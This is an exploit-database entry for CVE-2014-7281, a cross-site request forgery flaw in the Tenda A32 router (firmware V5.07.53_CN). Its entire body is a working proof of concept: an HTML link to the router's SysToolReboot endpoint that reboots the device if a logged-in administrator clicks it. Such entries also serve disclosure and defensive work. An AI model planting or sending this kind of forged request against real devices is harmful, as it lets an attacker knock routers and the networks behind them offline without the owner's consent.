id: 22753
date: 10/14/2014
title: Tenda A32 Router - CSRF Vulnerability
author: zixian
cves: CVE-2014-7281

# Exploit Title: Tenda A32 Router CSRF Vulnerability(reboot the Router)
# CVE ID :CVE-2014-7281
# Date: 2014-10-10
# Exploit Author: zixian
# Vendor Homepage: http://tenda.com.cn/
# Software Link: http://tenda.com.cn/Catalog/Product/325
# Version: V5.07.53_CN
 
 
 
When the administrator login, click on the link below， the device will reboot。
 
 
<a href="http://192.168.2.1/goform/SysToolReboot">reboot</a>

#  0day.today [2023-03-26]  #